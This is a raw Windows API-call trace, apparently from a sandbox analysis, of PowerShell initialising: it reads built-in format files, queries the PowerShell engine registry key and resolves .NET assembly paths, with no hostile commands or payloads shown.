	[0582.559] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0582.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.559] CoTaskMemFree (pv=0x49d030) 
	[0582.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0582.561] SetErrorMode (uMode=0x1) returned 0x1
	[0582.561] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0582.561] GetFileType (hFile=0x314) returned 0x1
	[0582.561] SetErrorMode (uMode=0x1) returned 0x1
	[0582.561] GetFileType (hFile=0x314) returned 0x1
	[0582.561] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.564] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.564] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.564] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.565] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.565] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.565] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x9e2, lpOverlapped=0x0) returned 1
	[0582.566] ReadFile (in: hFile=0x314, lpBuffer=0x3439182, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439182*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0582.566] ReadFile (in: hFile=0x314, lpBuffer=0x3439c38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3439c38*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0582.566] CloseHandle (hObject=0x314) returned 1
	[0582.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0582.566] SetErrorMode (uMode=0x1) returned 0x1
	[0582.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0582.566] SetErrorMode (uMode=0x1) returned 0x1
	[0582.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0582.566] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x314) returned 0x0
	[0582.567] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0582.567] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ed2a0
	[0582.567] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x1b8ed2a0, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0582.567] CoTaskMemFree (pv=0x1b8ed2a0) 
	[0582.567] RegCloseKey (hKey=0x314) returned 0x0
	[0582.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0582.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0582.574] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xb8b12733, Data2=0xd6a4, Data3=0x4f40, Data4=([0]=0xa1, [1]=0x1f, [2]=0x90, [3]=0xb1, [4]=0xfa, [5]=0xca, [6]=0x2b, [7]=0x6d))) returned 0x0
	[0582.578] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x9e73cd05, Data2=0xd337, Data3=0x43c2, Data4=([0]=0x97, [1]=0x6b, [2]=0x6, [3]=0x6a, [4]=0xfc, [5]=0x5f, [6]=0x7, [7]=0x77))) returned 0x0
	[0582.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0582.580] SetErrorMode (uMode=0x1) returned 0x1
	[0582.580] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0582.580] GetFileType (hFile=0x314) returned 0x1
	[0582.581] SetErrorMode (uMode=0x1) returned 0x1
	[0582.581] GetFileType (hFile=0x314) returned 0x1
	[0582.581] ReadFile (in: hFile=0x314, lpBuffer=0x34647a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34647a0*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.582] ReadFile (in: hFile=0x314, lpBuffer=0x34647a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34647a0*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.582] ReadFile (in: hFile=0x314, lpBuffer=0x34647a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34647a0*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.583] ReadFile (in: hFile=0x314, lpBuffer=0x34647a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34647a0*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.583] ReadFile (in: hFile=0x314, lpBuffer=0x34647a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34647a0*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0582.585] ReadFile (in: hFile=0x314, lpBuffer=0x34647a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34647a0*, lpNumberOfBytesRead=0x28d438*=0xfb2, lpOverlapped=0x0) returned 1
	[0582.585] ReadFile (in: hFile=0x314, lpBuffer=0x3463eba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3463eba*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0584.208] ReadFile (in: hFile=0x314, lpBuffer=0x34647a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34647a0*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0584.208] CloseHandle (hObject=0x314) returned 1
	[0584.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0584.208] SetErrorMode (uMode=0x1) returned 0x1
	[0584.208] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0584.209] SetErrorMode (uMode=0x1) returned 0x1
	[0584.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0584.209] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x314) returned 0x0
	[0584.209] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0584.209] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ed2a0
	[0584.209] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x1b8ed2a0, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0584.209] CoTaskMemFree (pv=0x1b8ed2a0) 
	[0584.209] RegCloseKey (hKey=0x314) returned 0x0
	[0584.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0584.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0584.212] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xa61ce382, Data2=0x90b7, Data3=0x4d31, Data4=([0]=0x91, [1]=0xc2, [2]=0xf5, [3]=0x67, [4]=0x29, [5]=0x78, [6]=0xeb, [7]=0x3d))) returned 0x0
	[0584.217] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xd8d6dbb, Data2=0x32d8, Data3=0x4b47, Data4=([0]=0x9e, [1]=0x9e, [2]=0x1d, [3]=0x22, [4]=0x77, [5]=0xa3, [6]=0xda, [7]=0x59))) returned 0x0
	[0584.218] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xde5c580d, Data2=0xa4b8, Data3=0x48bd, Data4=([0]=0x99, [1]=0x70, [2]=0xf3, [3]=0xef, [4]=0x5, [5]=0x0, [6]=0x21, [7]=0x16))) returned 0x0
	[0584.219] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xa20dff63, Data2=0x9011, Data3=0x4224, Data4=([0]=0xaf, [1]=0x74, [2]=0x2e, [3]=0x8f, [4]=0x5c, [5]=0xed, [6]=0xfe, [7]=0xbe))) returned 0x0
	[0584.220] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x487c28b, Data2=0xc68d, Data3=0x4b27, Data4=([0]=0xa3, [1]=0xdb, [2]=0x1d, [3]=0x3, [4]=0x7e, [5]=0xb1, [6]=0x2f, [7]=0xc0))) returned 0x0
	[0584.220] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xb7a75ed3, Data2=0x3816, Data3=0x4ed0, Data4=([0]=0xb8, [1]=0x28, [2]=0x31, [3]=0x5f, [4]=0xfb, [5]=0x89, [6]=0x51, [7]=0x3f))) returned 0x0
	[0584.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0584.221] SetErrorMode (uMode=0x1) returned 0x1
	[0584.222] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0584.222] GetFileType (hFile=0x314) returned 0x1
	[0584.222] SetErrorMode (uMode=0x1) returned 0x1
	[0584.222] GetFileType (hFile=0x314) returned 0x1
	[0584.222] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0584.224] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0584.224] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0584.225] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0584.226] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0584.226] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0584.226] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0xaca, lpOverlapped=0x0) returned 1
	[0584.226] ReadFile (in: hFile=0x314, lpBuffer=0x34afb32, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34afb32*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0584.226] ReadFile (in: hFile=0x314, lpBuffer=0x34b0500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34b0500*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0584.227] CloseHandle (hObject=0x314) returned 1
	[0584.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0584.227] SetErrorMode (uMode=0x1) returned 0x1
	[0584.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0584.227] SetErrorMode (uMode=0x1) returned 0x1
	[0584.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0584.228] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x314) returned 0x0
	[0584.228] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0584.228] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ed2a0
	[0584.228] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x1b8ed2a0, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0584.228] CoTaskMemFree (pv=0x1b8ed2a0) 
	[0584.228] RegCloseKey (hKey=0x314) returned 0x0
	[0584.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0584.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0584.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0584.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0584.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0585.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0585.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0585.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0585.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0590.860] VirtualQuery (in: lpAddress=0x28bf60, lpBuffer=0x28ce20, dwLength=0x30 | out: lpBuffer=0x28ce20*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.861] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xec5966eb, Data2=0x800d, Data3=0x4cd9, Data4=([0]=0x93, [1]=0xcc, [2]=0x51, [3]=0x65, [4]=0xc7, [5]=0xaf, [6]=0x40, [7]=0x4f))) returned 0x0
	[0590.862] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x622f6d2d, Data2=0x4cd9, Data3=0x40d9, Data4=([0]=0xbd, [1]=0xf0, [2]=0xc8, [3]=0x6c, [4]=0x2e, [5]=0xbe, [6]=0x1b, [7]=0xc6))) returned 0x0
	[0590.863] VirtualQuery (in: lpAddress=0x28c110, lpBuffer=0x28cfd0, dwLength=0x30 | out: lpBuffer=0x28cfd0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.864] VirtualQuery (in: lpAddress=0x28c110, lpBuffer=0x28cfd0, dwLength=0x30 | out: lpBuffer=0x28cfd0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.866] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x93745643, Data2=0xfc83, Data3=0x4de0, Data4=([0]=0xac, [1]=0xde, [2]=0xf5, [3]=0x91, [4]=0xc9, [5]=0x39, [6]=0xd2, [7]=0x57))) returned 0x0
	[0592.167] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xa688cd02, Data2=0xd594, Data3=0x42b3, Data4=([0]=0xb2, [1]=0xe6, [2]=0x6, [3]=0xb2, [4]=0x1d, [5]=0x1a, [6]=0xfc, [7]=0x3b))) returned 0x0
	[0592.167] VirtualQuery (in: lpAddress=0x28c360, lpBuffer=0x28d220, dwLength=0x30 | out: lpBuffer=0x28d220*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0592.168] VirtualQuery (in: lpAddress=0x28c0a0, lpBuffer=0x28cf60, dwLength=0x30 | out: lpBuffer=0x28cf60*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
